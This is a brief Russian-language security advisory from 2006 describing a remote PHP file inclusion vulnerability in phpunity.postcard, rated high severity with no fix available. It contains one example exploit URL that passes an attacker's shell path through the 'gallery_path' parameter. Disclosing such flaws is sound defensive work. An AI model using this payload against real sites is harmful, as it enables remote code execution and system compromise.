Security Lab

php инклюдинг в phpunity.postcard

Дата публикации:14.09.2006
Дата изменения:17.10.2006
Всего просмотров:2847
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpunity.postcard
Уязвимые версии: phpunity.postcard

Описание: Злоумышленник может включить и выполнить произвольный PHP код.

Пример/Эксплоит: http://[target]/phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]?

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.